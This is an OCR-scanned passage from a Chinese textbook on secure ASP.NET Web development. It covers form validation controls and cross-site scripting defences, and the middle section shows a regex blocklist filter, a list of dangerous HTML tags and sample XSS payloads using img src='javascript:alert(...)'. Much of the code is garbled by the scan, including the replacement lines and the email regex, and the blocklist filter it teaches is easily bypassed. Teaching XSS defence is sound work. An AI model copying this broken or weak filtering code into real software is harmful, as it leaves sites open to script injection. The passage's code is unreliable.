<ASP:RequiredFieldValidator Id="Validorl" Runat="Server" 
ControlToValidate="txtName"” Text=" 必 填 项 目 "/><br> 
电 话 :<ASP:TextBox Id="txtTel" Runat="Server"/><br> 
住 址 :<ASP:TextBox Id="txtAdd" Runat="Server"/><br> 
<ASP:Button Id="btnOK" Text=" 确 定 " OnClick="btnOK Click" Runat="Server"/> 
<ASP:Label Id="]lblMsg" Runat="Server"/> 
</Form> 
<Script Language="C#" Runat="Server"> 
void btnOK Click(object sender, System.EventArgs e) 
{ 
if (Page.IsValid) 
lblMsg .Text=" 验 证 成 功 !"; 

} 
</Script> 
</Html> 


客户 端 有 效 性 验证 虽然 解决 了 不 少 问 题 ， 但 仍然 要 在 服务 器 端 处 理 有 效 性 验证 ， 因 为 
表单 无 效 并 不 意味 着 ASPNET 不 会 执行 代码 ， 所 以 必须 在 方法 中 增加 一 些 检验 步骤 。 

最 简单 的 检验 表单 有 效 性 的 方法 是 检查 Page 对 象 的 IsValid 属性 ， 如 果 所 有 的 
Validation 控件 都 能 通过 验证 ， 则 该 属性 为 tue; 如 果 任 何 一 个 Validation 控件 未 通过 ， 则 
该 属性 为 false。 因 此 只 需 检查 该 属性 便 可 以 决定 是 否 执 行 代码 ， 如 前 面 例子 的 代码 。 


if (Page.IsValid) 
lblMsg .Text=" 验 证 成 功 !"; 


2. CompareValidator 验 证 控件 


CompareValidator 验证 控件 可 以 验证 使 用 者 输入 的 数据 ， 和 某 个 值 进行 比较 。 其 使 用 
的 语法 为 : 
<ASP:CompareValidator Id=" 验 证 控件 名 称 " 


Runat="Server" 
ControlToValidate=" 要 验证 的 控件 名 称 " 
Operator="DataTypeCheck |Equal |NotEqual |GreaterThan |GreaterThanEqual 
1LessThan 
1LessThanEqual" 
TYPpe=" 数 据 类 别 " 
ControlToCompare=" 要 比较 的 控件 名 称 "1ValueToCompare=" 要 比较 的 值 " 
ErrorMessage=" 所 要 显示 的 错误 信息 " 
Text=" 未 通过 验证 时 所 显示 的 信息 "/> 


=" 
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CompareValidator 验证 控件 常用 属性 如 表 6-1 所 示 : 


表 6-1 CompareValidator 验 证 控件 属性 





属 性 功 能 
ControlToValidate | 所 要 验证 的 控件 名 称 
ErrorMessage 所 要 显示 的 错误 信息 





所 要 执行 的 比较 种 类 ， 有 : DataTypeCheck (只 比较 数据 型 态 ) 、Equal (等 于 ) 、 
NotEqual (不 等 于 ) 、GreaterThan( 大 于 ) 、GreaterThanEqual( 大 于 等 于 )、LessThan 
(小 于 ) 、LessThenEqual (小 于 等 于 ) 。 其 中 如 果 为 DataTypeCheck 时 ， 只 需要 
填 入 要 验证 的 数据 型 态 ， 不 需要 设 定 ControlToCompare 或 是 alueToCompare 
Type 所 要 比较 或 验证 的 数据 类 型 ， 可 以 设 定 为 : Currency、Date、Double、Integer 


Operator 








CompareValidator 验证 控件 通过 以 下 所 示 的 程序 演示 限制 输入 必须 大 于 指定 数值 ， 否 
则 无 法 触发 按钮 的 事件 程序 ， 其 HTML 代码 如 下 : 


年 龄 :<ASP:TextBox Id="txtAge" Runat="Server"/> 
<ASP:CompareValidator Id="Validorl" Runat="Server" 
ControlToValidate="txtAge" 

ValueToCompare="18" 

Operator="GreaterThanEqual" 

Type="Integer" 

Text=" 您 必须 大 于 十 八 岁 才 可 以 浏览 本 站 "/><br> 

住 址 :<ASP:TextBox Id="txtAdd" Runat="Server"/><br> 


下 列 演示 代码 实现 限制 使 用 者 的 输入 必须 是 整数 型 态 的 数据 ， 其 HTML 代码 如 下 : 


<Html> 
<Form Id="Forml"Runat="Server"> 
姓 名 :<ASP:TextBox Id="txtName"Runat="Server"/><br> 


ControlToValidate="txtAge" 
Operator="DataTypeCheck" 
Type="Integer" 
Text=" 您 必须 输入 数值 "/><br> 


{ if (Page.IsValid) 
lblMsg .Text=" 验 证 成 功 ! "; } 

</Script> 

</Html> 


在 上 述 程序 例子 中 ， 并 没有 限制 使 用 者 一 定 要 输入 年 龄 数据 ， 若 要 限制 使 用 者 一 定 要 
填 入 数据 ， 可 以 搭配 RequireFieldValidator 作 验 证 ， 如 下 列 代码 所 示 : 


年 龄 :<ASP:TextBox Id="txtAge"Runat="Server"/> 
<ASP:CompareValidator Id="Validorl" Runat="Server" 
ControlToValidate="txtAge" 

Operator="DataTypeCheck" 

Type="Integer" 

Text=" 您 必须 输入 数值 "/> 

<ASP:RequiredFieldValidator id="Validor2" Runat="Server" 
ControlToValidate="txtAge" 

Text=" 必 填 项 目 "/><br> 

住 址 :<ASP:TextBox Id="txtAdd"Runat="Server"/><br> 


gs 
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3. RangeValidator 控 件 


RangeValidator 控件 用 来 限制 使 用 者 所 输入 的 数据 在 指定 的 范围 之 内 ,其 使 用 的 属性 设 


置 代码 如 下 : 


<ASP:RangeValidator Id=" 被 程序 代码 所 控制 的 控件 名 称 " 


Runat="Server" 

Control To Validate=" 要 验证 的 控件 名 称 " 
MinimumValue=" 最 小 值 " 
MaximumValue=" 最 大 值 " 
MinimumControl=" 限 制 最 小 值 的 控件 名 称 " 
MaximumControl=" 限 制 最 大 值 的 控件 名 称 " 
Type=" 资 料 型 别 " 
ErrorMessage=" 所 要 显示 的 错误 信息 " 
Text=" 未 通过 验证 时 所 显示 的 信息 "/> 


RangeValidator 验证 控件 常用 属性 如 表 6-2 所 示 。 


属 性 
ControlToValidate 
ErrorMessage 
MinimumValue 
MaximumValue 
MinimumControl 
MaximumControl 
Type 
Text 





表 6-2 ”RangeValidator 验 证 控件 属性 








功 能 
所 要 验证 的 控件 名 称 
所 要 显示 的 错误 信息 
限制 可 以 接受 的 最 小 值 
限制 可 以 接受 的 最 大 值 
限制 可 以 接受 最 小 值 所 要 参考 的 控件 
限制 可 以 接受 最 大 值 所 要 参考 的 控件 





的 数据 型 别 , 可 以 设 定 为 Currency、 Date 、Double、 Integer、 String 
未 通过 验证 时 所 显示 的 信息 


RangeValidator 验证 控件 可 以 通过 下 面 的 程序 限制 输入 数值 的 范围 ;否则 无 法 触发 按钮 
的 事件 程序 ， 其 HTML 代码 如 下 : 


年 龄 :<ASP:TextBox Id="txtAge"Runat="Server"/> 
<ASP:RangeValidator Id="Validorl"Runat="Server" 
ControlToValidate="txtAge" 

MaximumValue="40" 

MinimumValue="18" 

Type="Integer" 

Text=" 只 接受 18-40"/><br> 

住 址 :<ASP:TextBox Id="txtAdd"Runat="Server"/><br> 


4. RegularExpressionValidator 控 件 


RegularExpressionValidator 控件 可 以 用 来 执行 更 详细 的 验证 ， 也 就 是 说 可 以 做 更 细微 
的 限制 ， 其 使 用 语法 为 : 


<ASP:RegularExpressionValidator 


Id=" 被 程序 代码 所 控制 的 名 称 " 


Runat="Server" 


ControlToValidate=" 要 验证 的 控件 名 称 " 


全 


无 懈 可 击 一 一 全 方位 构建 安全 Web 系统 





ValidationExpression=" 验 证 规则 " 
ErrorMessage=" 所 要 显示 的 错误 信息 " 
Text=" 未 通过 验证 时 所 显示 的 信息 " 

> 


RegularExpressionValidator 控件 常用 属性 如 表 6-3 所 示 。 


表 6-3 RegularExpressionValidator 控 件 常用 属性 











属 性 功 能 
ControlToValidate 所 要 验证 的 控件 名 称 
ErrorMessage 所 要 显示 的 错误 信息 
ValidationExpression 验证 规则 


Text 





未 通过 验证 时 所 显示 的 信息 


其 中 ValidationExpression 验证 规则 属性 是 限制 数据 所 输入 的 叙述 ， 其 常用 符号 如 表 
6-4 所 示 。 


表 6-4 ValidationExpression 验证 控件 属性 


符 号 功 能 
0 用 来 定义 单一 字符 的 内 容 
0 用 来 定义 需 输入 的 字符 个 数 。 例 ， 符 号 [a-z]{4} 
[] 表示 任意 字符 
四 表示 最 少 输入 1 个 字符 ， 最 多 到 无 限 多 个 字符 
上 HH] 表示 最 少 可 以 不 输入 ， 最 多 到 无 限 多 个 字符 


ValidationExpression 常用 符号 功能 如 下 : 

(1) 吕 符 号 : 

“[]” 符 号 可 以 用 来 定义 接受 的 单一 字符 ， 例 如 : 

[a-z A-Z] 只 接受 a~z 或 是 A 一 Z 的 英文 字符 。 

[x-z XX-Z] 只 接受 小 写 的 x~z 或 大 写 的 X~Z。 

[win] 内 接受 w、i、n 的 英文 字母 。 

[人 inux] 指 除了 1、i、n、u、x 之 外 的 英文 字母 都 接受 。 

(2) 侣 符号: 

“人 ”符号 可 以 用 来 表示 接受 多 少 字 符 ， 例 如 : 

[a-z A-Z]{4} 表 示 接 受 只 接受 4 个 字符 。 
[a-z]{4} 表 示 只 接受 共 4 个 a~z 小 写字 符 。 

[a-z A-Z]{4,6} 表 示 最 少 接 受 4 个 字符 ， 最 多 接受 6 个 字符 。 
[a-z A-Z]{4,} 表 示 最 少 接受 4 个 字符 ， 最 多 不 限制 。 

(3) [.] 符 号 : 

“[]” 符 号 可 以 用 来 表示 接受 除了 空白 外 的 任意 字符 ， 例 如 : 
{4} 表示 接受 4 个 除了 空白 外 的 任意 字符 。 

(4) [4] 符 号 : 

“[*#]” 符 号 表示 最 少 0 个 符合 ， 最 多 到 无 限 多 个 字符 。 例 如 : 
[a-z A-Z] * 表 示 不 限制 数目 ， 接 受 a~z 或 A~Z 的 字符 ， 也 可 以 不 输入 。 














= 
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(5) [+H] 符 号 : 

“[+]” 符 号 表示 最 少 1 个 符合 ， 最 多 到 无 限 多 个 字符 。 例 如 : 

[a-zA-Z]+ 表 示 不 限制 数目 ， 接 受 a~z 或 A~Z 的 字符 ， 但 是 至 少 输入 一 个 字符 。 

下 列 实例 演示 的 是 演示 使 用 者 输入 的 账号 ， 必 须 以 英文 字母 为 开头 ， 而 且 最 少 要 输入 
4 个 字符 ， 最 多 可 输入 8 个 字符 ， 其 代码 如 下 : 


<Html> 

<Form Id="Form1"Runat="SerVer"> 

账 号 :<ASP:TextBox Id="txtId"Runat="Server"/> 
<ASP:RegularExpressionValidator Id="Validorl"Runat="Server" 
ControlToValidate="txtId" 
ValidationExpression=" [a-zR-2Z ]{4,8}" 

Text=" 输 入 错误 !1"/><br> 

<ASP:Button Id="btnOK"Text=" 确 定 "OnClick="btnOK Click" 
Runat="Server"/> 

<ASP:Label Id="lblMsg"Runat="Server"/> 

</Form> 

<Script … … … … (以 下 同 前 程序 代码 ) 


下 列 实例 程序 代码 演示 的 是 限制 使 用 者 输入 的 电子 邮件 信箱 信息 为 必须 包含 [@」 符 
号 ， 其 代码 如 下 : 


<Html> 

<Form Id="Forml" Runat="Server"> 

E Mail:<ASP:TextBox Id="txtEmail" Runat="Server"/> 
<ASP:RegularExpressionValidator Id="Validorl"Runat="Server" 
ControlToValidate="txtEmail" 

ValidationExpression=".+@.+" 


Text=" 错 误 !"/> 
<ASP:Button Id="btnOK" Text=" 确 定 " OnClick="btnOK Click" 
… (以 下 同 前 程序 代码 


下 列 实例 程序 代码 演示 的 是 限制 使 用 者 输入 的 电话 号 码 ， 必 须 依 照 使 用 习惯 输入 分 隔 
线 才能 通过 验证 ， 其 代码 如 下 : 

<ASP:RegularExpressionValidator Id="Validorl" Runat="Server" 
ControlToValidate="txtTel" 
ValidationExpression="[0-9] {2,4}-[0-9] {3,4}-[0-9] {3,4}" 
Text=" 错 误 !"/><br> 
<ASP:Button Id="btnOK" Text=" 确 定 " OnClick="btnOK Click" 

“(以 下 同 前 程序 代码 》 


使 用 者 输入 0700-004-094 或 0984-734-678 或 23-4532-5678 都 可 以 接受 。 


5. CustomValidator 验 证 控件 


如 果 开 发 人 员 要 处 理 的 数据 有 上 述 验 证 控件 无 法 验证 的 特殊 表达 式 ， 可 以 利用 
CustomValidator 控件 。CustomValidator 控件 可 以 自 定数 据 的 检验 方式 ， 其 使 用 语法 为 : 


<ASP:CustomValidator 

Id=" 被 程序 代码 所 控制 的 名 称 " Runat="Server" 
ControlToValidate=" 要 验证 的 控件 名 称 " 
OnServerValidate=" 自 订 的 验证 程序 " 
ErrorMessage=" 所 要 显示 的 错误 信息 " 
Text=" 未 通过 验证 时 所 显示 的 信息 "/> 
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CustomValidator 验证 控件 在 执行 自 定 义 的 验证 时 ， 是 呼叫 OnServerValidate 属性 所 指 
定 的 程序 来 执行 验证 ， 当 被 呼叫 的 程序 传 回 True 时 则 表示 验证 成 功 ， 传 回 False 则 表示 验 
证 失败 。 


6. ValidationSummary 验 证 控件 





ValidationSummary 控件 可 以 用 来 显示 尚未 通过 验证 的 字段 ， 其 使 用 语法 为 : 
<ASP:ValidatorSummary Id=" 被 程序 代码 所 控制 的 名 称 " 


Runat="Server" 
DisplayMode="BulletList |List 1SingParagraph" 


HeaderText=" 控 件 标题 文字 "/> 
ValidationSummary 控件 常用 属性 如 表 6-5 所 示 。 
表 6-5 ValidationSummary 验 证 控件 属性 
功 能 
显示 信息 的 模式 。 可 以 设 定 为 BulletList， 以 项 目的 方式 显示 。List 为 显示 在 不 同 列 。 
SingleParagraph 为 显示 在 同一 列 
控件 的 标题 文字 


这 几 个 验证 控件 用 起 来 非常 简单 ， 但 ASPNET 2.0 以 下 版 本 没有 一 种 好 的 方法 把 这 些 
验证 控件 组 合 在 一 起 ， 控 件 只 验证 页 面 的 一 部 分 ， 并 且 不 论 页 面 其 他 部 分 的 输入 内 容 是 什 
么 ， 都 可 以 进行 回 发 。 通 俗 地 讲 就 是 ， 要 么 全 部 通过 ， 要 么 全 部 不 通过 。 

ASPNET 2.0 以 上 版 本 中 的 验证 控件 彻底 解决 了 这 个 问题 。 现 在 可 以 使 用 验证 控件 的 
ValidationGroup 属性 来 组 合 验 证 控件 ， 同 时 用 相同 的 方式 将 按钮 控件 分 配给 组 ， 并 且 当 
个 组 里 所 有 的 验证 控件 都 对 输入 内 容 感到 满意 时 ， 验 证 组 才 允 许 页 面 回 发 。 下 面 的 
Validate.aspx 示范 了 ValidationGroup 的 用 法 : 





DisplayMode 





HeaderTex 





Validate.aspx: 
<html xmlns="http:// www.w3.0org/1999/xhtml" > 
<head runat="server"><title>Untitled Page</title></head> 
<body><form id="forml" runat="server"><div> <strong> 
<span style="color: #3300cc">New User Registration:<br /> 
</span></strong><br/> 
<table style="width: 541lpx; height: 77px"><tr> 
<td style="width: 128px; height: 20px"> 
New User Name:</td> 
<td style="width: 158px"> 
<asp:TextBox ID="NewUserTextBox" runat="server"></asp: 
TextBox></td> 
<td style="width: 31lpx"> 
<asp:RequiredFieldValidator ID="RequiredFieldValidator]l" runat="server" 
ControlToValidate="NewUserTextBox" 
ErrorMessage="RequiredFieldValidator" ValidationGroup="NewUser"> 
</asp:RequiredFieldValidator></td></tr> 
<tr><td style="width: 128px">Password:</td> 
<td style="width: 158px"> 
<asp:TextBox ID="PasswordTextBoxl" runat="server"></asp:TextBox></td> 
<td style="width: 311px"> 
<asp:RequiredFieldValidator ID="RequiredFieldValidator2" ITunat="serVer" 
ControlToValidate="PasswordTextBoxl" 
ErrorMessage="RequiredFieldValidator" ValidationGroup="NewUser"> 
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</asp:RequiredFieldValidator></td></tr> 
<tr><td style="width: 128px; height: 17px"> 
Confirm password:</td> 
<td style="width: 158px; height: 17px"> 
<asp:TextBox ID="PasswordTextBox2" runat="server"></asp: 
TextBox></td> 
<td style="width: 31lpx; height: 17px"> 
&nbsp; <asp:CompareValidator ID="CompareValidatorl" runat="server" 
ControlToCompare="PasswordTextBox2" 
ControlToValidate="PasswordTextBoxl" ErrorMessage="Password 
not equal" 
ValidationGroup="NewUser"></asp:CompareValidator></td></tr> 
<tr><td styl width: 128px; height: 26px">Email:</td> 
<td style="width: 158px; height: 26px"> 
<asp:TextBox ID="EmailTextBox" runat="server"> </asp: 
TextBox></td> 
<td style="width: 31llpx; height: 26px"> 
<asp:RegularExpressionValidator ID="RegularExpressionValidator1" 
runat="server" ControlToValidate="EmailTextBox" 
ErrorMessage="Invalid Email format" ValidationGroup="NewUser" 
ValidationExpression="^ 
Ow Nl Ne oS 0 0 OM (NN 
([a-zA-2Z] {2,4}1[0-9] {1,3}) (\]?)$"> 
</asp:RegularExpressionValidator></td></tr> 
<tr><td colspan="3"> 
<asp:Button ID="ConfirmButton" runat="server" OnClick="ConfirmButton 
Click" Text="Confirm" 
Width="57px" ValidationGroup="NewUser" /></td> 
</tr></table></div> 
<span style="color: #3300cc"><strong>User Login:<br /> 
</strong><table style="font-weight: normal; width: 37lpx"> 
<tr><td style="width: 72px"> 
<span style="color: #000000">Username: </span></td> 
<td style="width: 149px"><asp:TextBox ID="UsernameTextBox" runat= 
"server"></asp:TextBox></td> 
<td><asp:RequiredFieldValidator ID="RequiredFieldValidator3" runat= 
"server" 
ControlToValidate="UsernameTextBox" ErrorMessage="Input Username" 
ValidationGroup="OldUser" 
Width="109px"> asp:RequiredFieldValidator></td></tr> 
<tr><td style="width: 72px"><span style="color: #000000">Password:</span> 
</td> 
<td style="width: 149px"> 
<asp:TextBox ID="PasswordTextBox" runat="server"></asp:TextBox></td> 
<td><asp:RequiredFieldValidator ID="RequiredFieldValidator4" runat= 
"server" 
ControlToValidate="PasswordTextBox" ErrorMessage="Input password" Vali- 
dationGroup="OldUser" 
Width="107px"> </asp:RequiredFieldValidator></td></tr> 
<tr><td colspan="3"> 
<asp:Button ID="LoginButton" runat="server" OnClick="LoginButton Click" 
Text="Login" 
Width="60px" ValidationGroup="OldUser"/></td></tr> 
</table></span></form> 
</body></html> 
Validate.aspx.cs: 
public partial class Default : System.Web.UI.Page { 
protected void ConfirmButton Click(object sender, EventArgs e){ 
Response.Redirect ("welcome.aspx"); 









} 
protected void LoginButton Click(object sender, EventArgs e){ 
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Response.Redirect ("start .aspx"); 

} 

该 实例 中 使 用 了 RequiredFieldValidator，CompareValidator 以 及 RegularExpression 
Validator 的 组 合 。 可 以 看 出 ， 使 用 验证 组 要 为 每 一 个 验证 控件 指定 一 个 验证 组 的 名 称 ， 名 
称 可 以 自己 随便 定义 ， 不 过 要 保证 组 里 的 验证 控件 的 组 名 称 都 相同 。 
上 面 这 个 例子 中 ， 使 用 了 两 个 验证 组 ，NewUser 组 和 Login 组 ， 然 后 把 相应 的 按钮 也 
加 入 组 中 ， 这 样 就 可 以 在 按 下 按钮 的 时 候 ， 验 证 对 应 组 的 内 容 ， 如 果 验 证 通过 就 可 以 提交 
页 面 而 且 不 用 理会 组 以 外 验证 控件 的 状态 。 

另外 ， 在 例子 中 还 增加 了 一 个 SetFoucsOnError 属性 ， 当 出 错时 ， 将 焦点 移 到 控件 上 。 
这 样 就 不 会 使 用 户 面临 单 击 了 按钮 而 没有 错误 信息 的 提示 的 情况 。 另 外 ，CustomValidator 
增加 了 ValidateEmptyText 属性 ， 让 用 户 可 以 自 定义 验证 控件 在 值 为 空 时 也 进行 验证 。 














63 信息 过 滤 


数据 过 滤 在 任何 语言 、 任 何平 台 上 都 是 Web 应 用 安全 的 基石 。 这 里 所 说 的 数据 过 滤 包 
含 检验 输入 到 应 用 的 数据 以 及 从 应 用 输出 的 数据 ， 而 一 个 好 的 软件 设计 可 以 帮助 开发 人 员 
做 到 : 确保 数据 过 滤 无 法 被 绕 过 ， 确 保 不 合法 的 信息 不 会 影响 合法 信息 ， 并 且 识 别 数据 的 
来 源 。 

关于 如 何 确保 数据 过 滤 无 法 被 绕 过 有 各 种 各 样 的 观点 ， 而 其 中 的 两 种 观点 比 其 他 更 加 
通用 并 可 提供 更 高 级 别 的 保障 ， 由 此 得 出 的 方法 也 分 为 两 大 类 : 利用 正则 表达 式 和 .NET 
自 带 技术 ， 下 面 将 分 别 为 读者 讲解 。 


1. 正则 表达 式 过 滤 数 据 


目前 的 互联 网 到 处 都 需要 提供 用 户 输入 信息 ， 论 坛 发 帖 时 使 用 了 FreeTextBox 控件 ， 
它 会 将 输入 的 内 容 转 为 HTML 再 发 送 到 数据 库 ， 但 如 果 用 户 输 有 恶意 代码 ,系统 很 可 能 被 
挂 上 木马 病毒 或 进行 跨 站 攻击 。 

要 怎样 才能 正常 地 输入 HIML 代码 , 然后 青 显 示 出 来 呢 ? 注 意 , 是 安全 地 输出 HTML 
页 面 ， 而 不 是 输出 HIML 代码 。 

如 果 采 用 .NET 的 HtmlEncode 和 HtmlDecode 方法 则 会 进行 重新 编码 。 这 样 很 可 能 ; 
基本 的 HIML 代码 都 会 被 禁止 掉 。 

目前 对 于 这 个 问题 也 没有 完美 的 解决 办 法 ， 但 是 根据 一 些 脚 本 攻击 的 实例 可 以 了 解 到 
一 些 情况 。 大 部 分 非法 的 脚本 代码 是 以 JavaScript 开头 的 ， 或 是 一 些 引用 其 他 网 页 的 框架 
调用 语句 等 ， 非 法 脚本 代码 分 类 后 大 致 如 下 : 

(1) <scrip 人 标记 中 包含 的 代码 。 

(2) <a hre 全 javaScript: … 人 中 的 代码 。 

(3) 其 他 基本 控件 的 on… 事 件 中 的 代码 。 

(4) iframe 和 frameset 中 载 入 其 他 页 面 的 代码 。 

思路 理 清 后 ， 事 情 变 得 就 简单 多 了 。 下 面 的 实例 是 一 个 简单 的 方法 ， 用 正则 表达 式 把 














= 
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以 上 几 点 涉及 的 代码 替换 掉 。 假 如 读者 在 今后 的 工作 中 有 新 的 发 现 ， 也 可 以 自行 扩充 该 
放 法 。 

该 方法 名 称 为 DataFilters， 通 过 正则 表达 式 禁止 了 JavaScript 脚本 或 跨 站 调用 的 脚本 ， 
最 终 将 处 理 过 的 HTML 输出 给 调用 者 ， 其 代码 如 下 : 


protected void DataFilters (string html) 
{ 





System.Text .RegularExpressions.Regex regexl = new 

System.Text .RegularExpressions.Regex (@"<script[\s\S]+</script 
*>", System.Text .RegularExpressions.RegexOptions.IgnoreCase); 
System.Text.RegularExpressions.Regex regex2 = new 

System.Text .RegularExpressions.Regex(@" href *= *[\s\S]*script 
*:",System.Text .RegularExpressions.RegexOptions.IgnoreCase); 
System.Text .RegularExpressions.Regex regex3 = new 

System.Text .RegularExpressions.Regex (@" 

on[\s\S]*=",System.Text .RegularExpressions.RegexOptions.IgnoreCase); 
System.Text.RegularExpressions .Regex regex4 = new 

System.Text .RegularExpressions.Regex (@"<iframe[\s\S]+</iframe 
*>",System.Text .RegularExpressions.RegexOptions.IgnoreCase); 
System.Text.RegularExpressions .Regex regex5 = new 

System.Text .RegularExpressions.Regex (@"<frameset[\s\S]+</frameset 

*>", System.Text .RegularExpressions.RegexOptions.IgnoreCase); 
html = regex1.Replace (htm1，""); // 过 滤 <script></script> 标 记 
html = regex2.Replace (htm1，""); // 过 滤 href=javascript: (<A>) 属性 
html = regex3.Replace (html," disibledevent="); // 过 滤 其 他 控件 的 on. . . 


事件 
html = regex4.Replace (html，""); // 过 滤 iframe 
html = regex5.Replace (html,，""); // 过 滤 frameset 


return html; 


2. .NET 自 带 技术 


ASPNET 新 版 本 引入 了 对 提交 表单 自动 检查 是 否 存 在 XSS〈 跨 站 脚本 攻击 ) 的 能 
当 用 户 试图 用 <xxxx> 之 类 的 输入 影响 页 面 返回 结果 的 时 候 ，ASPNET 的 引擎 会 引发 一 个 
HttpRequestValidationExceptioin 。 

默认 情况 下 会 返回 如 下 文字 的 页 面 : 


Server Error in '/YourApplicationPath' Application 


A potentially dangerous Request.Form value was detected from the client 
(txtName="<b>"). 


Description: Request Validation has detected a potentially dangerous client 
input value, and processing of the request has been aborted. This value may 
indicate an attempt to compromise the security of your application, such 
as a cross-site scripting attack. You can disable request validation by 
setting validateRequest=false in the Page directive or in the configuration 
section. However, it is strongly recommended that your application explicitly 
check all inputs in this case. 


Exception Details: System.Web.HttpRequestValidationException: A potentia— 


lly dangerous Request.Form value was detected from the client 
(txtName="<b>"). 
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该 页 面 就 是 通知 输入 方 ， 在 输入 数据 中 发 现 潜在 的 不 安全 数据 或 者 跨 站 攻击 脚本 。 这 
是 ASPNET 提供 的 一 个 很 重要 的 安全 特性 。 因 为 很 多 程序 员 没 有 安全 概念 ， 甚 至 不 知道 
XSS 这 种 攻击 的 存在 ， 知 道 主 动 去 防护 的 更 是 少 之 又 少 ， ASPNET 在 这 一 点 上 做 到 了 默认 
安全 。 这 样 让 对 安全 不 是 很 了 解 的 程序 员 依旧 可 以 写 出 有 一 定安 全 防护 能 力 的 网 页 。 

但 是 当 利用 Google 搜索 HttpRequestValidationException 或 “A potentially dangerous 
Request.Form value was detected from the client” 时 ， 就 会 发 现 ， 大 部 分 人 给 出 的 解决 方案 
是 在 ASPNET 页 面 描述 中 通过 设置 validateRequest=false 禁用 这 个 特性 ， 而 不 去 关心 该 网 
站 是 否 真 的 不 需要 这 个 特性 。 

这 样 的 做 法 是 令 人 胆战心惊 的 。 为 什么 很 多 程序 员 想 要 禁止 validateRequest 呢 ? 有 一 
部 分 是 真 的 需要 用 户 输 入 “<>” 之 类 的 字符 ， 还 有 一 部 分 其 实 并 不 是 允许 用 户 输入 那些 容 
易 引 起 XSS 的 字符 ， 而 是 单纯 讨厌 这 种 报错 的 形式 ， 毕 竟 一 大 段 英文 加 上 一 个 ASPNET 
典型 异常 错误 信息 ， 让 用 户 觉得 是 站 点 出 错 ， 而 不 是 用 户 输入 了 非法 字符 ， 可 是 程序 员 又 
不 知道 怎么 处 理 报错 ， 所 以 就 把 这 个 问题 简单 化 处 理 ， 直 接 禁 止 validateRequest。 

正确 的 做 法 是 ， 在 当前 页 面 添加 Page_Error 函数 ， 来 捕获 所 有 页 面 处 理 过 程 中 发 生 的 
而 没有 处 理 的 异常 。 然 后 给 用 户 一 个 合法 的 报错 信息 。 如 果 当 前 页 面 没有 Page_Error()， 这 
个 异常 将 会 送 到 Global.asax 的 Application Error() 来 处 理 , 当然 也 可 以 在 Application_Error() 
中 写 通 用 的 异常 报错 处 理 函 数 。 如 果 两 个 地 方 都 没有 写 异常 处 理 函 数 ， 才 会 显示 这 个 默认 
的 报错 页 面 。 

举例 而 言 ， 处 理 这 个 异常 其 实 只 需 如 下 很 简短 的 代码 。 在 页 面 的 Code-behind 模式 中 
加 入 如 下 代码 ， 该 代码 用 来 捕获 异常 操作 : 


protected void Page Error(object sender, EventArgs e) 

















Exception ex = Server.GetLastError(); 

if (ex is HttpRequestValidationException) 

a A .Write ("请 您 输入 合法 字符 串 ") ; 
Server.ClearError(); // 如 果 不 ClearError () 这 个 异常 会 继续 传 到 
Application Error() 

} 

现在 ， 这 个 程序 就 可 以 截获 HttpRequestValidationException 异常 ， 而 且 可 以 按照 程序 
员 的 意愿 返回 一 个 合理 的 报错 信息 。 如 果 只 需要 处 理 异常 ， 使 用 类 似 于 上 面 的 代码 即 可 。 

对 于 那些 明确 禁止 了 这 个 特性 的 程序 员 ， 一 定 要 手动 检查 必须 过 滤 的 字符 串 ;， 否则 站 
点 很 容易 引发 跨 站 脚本 攻击 。 

关于 存在 Rich Text Editor 的 页 面 应 该 如 何 处 理 ? 

如 果 页 面 有 富 文本 编辑 器 (Rich Text Editor) 控 件 , 那么 必然 会 导致 有 <xxx> 类 的 HIML 
标签 提交 回来 。 在 这 种 情况 下 ， 不 得 不 将 validateRequest="false"。 那 么 安全 性 怎么 处 理 ? 
如 何在 这 种 情况 下 最 大 限度 的 预防 跨 站 脚本 攻击 呢 ? 

笔者 建议 采取 安全 上 称 为 “默认 禁止 ， 显 式 允 许 ” 的 策略 。 

首先 , 将 输入 字符 串 用 HttpUtility HtmlEncode0 编 码 ,， 将 其 中 的 HTML 标签 彻底 禁止 。 
然后 ， 再 对 感 兴趣 的 、 并 且 是 安全 的 标签 ， 通 过 ReplaceO 进 行 蔡 换 。 例 如 ， 和 希望 有 "<b>" 
标签 ， 那 么 就 将 "&ltb&gt" 显 式 的 奉 换 回 "<b>"。 
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示范 代码 如 下 : 


void submitBtn Click(object sender, EventArgs el) 
// 将 输入 字符 串 编 码 ， 这 样 所 有 的 HTML 标签 都 失效 了 
StringBuilder sb = new StringBuilder( 

HttpUtility.HtmlEncode (htmlInputTxt .Text)); 

// 然后 选择 性 的 允许 <b> 和 <i> 
sb.Replace("&lt;bggt;", "<b>"); 
sb.Replace ("glt;/bggt;", "™"); 
sabeReplace(l"elt?ieqte", "<iS")s 
sbeReplace("elt: /egtEr™ "ys 
Response.Write (sb.Tostring()); 

} 


这 样 一 来 ， 即 允许 了 部 分 HTML 标签 ， 又 禁止 了 危险 的 标签 。 
笔者 建议 要 慎重 允许 下 列 HTML 标签 ， 因 为 这 些 HTML 标签 都 是 有 可 能 导致 跨 站 脚 
本 攻击 的 。 


<applet> 
<body> 
<embed> 
<frame> 
<script> 
<frameset> 
<html> 
<iframe> 
<img> 
<style> 
<layer> 
<link> 
<ilayer> 
<meta> 
<object> 


这 里 最 让 人 不 能 理解 的 可 能 就 是 <img>。 但 是 看 过 下 列 代码 后 ， 就 应 该 明白 其 危险 
性 了 。 


<img src="javascript:alert('hello');"> 
<img src="java&g#010;script:alert ('hello');"> 
<img src="javag#X0A;script:alert ('hello');"> 


可 以 看 到 , 通过 <img> 标 签 是 有 可 能 导致 JavaScript 执行 的 。 对 于 样式 标签 <style> 也 是 
- 样 ， 它 同样 可 能 被 用 来 置 入 JS 脚本 ， 如 下 代码 所 示 : 
<style TYPE="text/javascript">... 


alert ('hello'); 
</style> 
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第 7 章 编写 安全 中 间 件 


本 章 将 通过 范例 说 明 如 何 构建 更 加 安全 的 组 件 ， 从 而 减少 系统 被 攻击 的 可 能 性 。 首先 ， 
介绍 组 件 所 面临 的 威胁 ; 接着 是 应 对 的 方式 : 最 常见 的 方式 有 强 签名 、LIO 文件 安全 操作 、 
注册 表 安 全 操作 、 序 列 化 安全 、 多 线程 访问 安全 等 。 


7.1 脆弱 的 中 间 件 


常 说 的 组 件 其 实 是 一 些 COM+ 的 基础 结构 服务 ， 也 称 做 企业 服务 。 企 业 服务 组 件 由 一 
个 或 多 个 托管 类 组 成 ， 这 些 托管 类 派生 自 System.EnterpriseServices.Serviced Component， 
企业 服务 可 从 托管 代码 中 访问 。 

